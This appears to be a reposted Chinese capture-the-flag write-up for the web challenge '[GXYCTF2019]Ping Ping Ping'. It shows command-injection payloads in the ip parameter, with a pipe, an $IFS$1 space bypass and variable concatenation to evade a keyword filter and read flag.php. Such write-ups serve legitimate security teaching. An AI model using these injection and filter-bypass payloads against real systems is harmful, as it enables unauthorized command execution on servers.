[GXYCTF2019]PingPingPing

admin 2026-06-26 07:39:25 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 该文档记录CTF题目《[GXYCTF2019]PingPingPing》的Web渗透解题过程。通过ip参数注入实现命令执行,使用管道符绕过基础过滤,利用IFS1绕过空格限制,最终通过变量拼接a=g绕过flag关键词过滤成功读取flag.php文件。 综合评分: 85 文章分类: CTF,WEB安全,渗透测试,漏洞分析,安全工具


cover_image

[GXYCTF2019]Ping Ping Ping

原创

devildollking devildollking

熔城Sec

2026年6月24日 09:00 辽宁

在小说阅读器读本章

去阅读

01

题目简介

  • 题目名称:[GXYCTF2019]Ping Ping Ping
  • 题目平台:CTF²
  • 题目类型:Web

02

解题步骤

启动并访问靶机

先构造一个参数,看看具体传参是什么样子的

/?ip=127.0.0.1

猜测可能和路由器的后台命令执行相似,使用管道符进行绕过,构造参数看一下

/?ip=127.0.0.1|ls

成功命令执行,接下来就是进行flag.php读取就行了,但是发现对空格存在过滤

/?ip=127.0.0.1|cat flag.php

既然对空格过滤,那就使用$IFS$1 绕过空格过滤

/?ip=127.0.0.1|cat$IFS$1flag.php

但是发现还是没有成功读取,那这边我们读取一下index.php文件,看一下这个文件里面有什么?

/?ip=127.0.0.1|cat$IFS$1index.php

发现对flag有过滤,那我们尝试绕过

/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:熔城Sec devildollking devildollking《[GXYCTF2019]Ping Ping Ping》

评论:0   参与:  0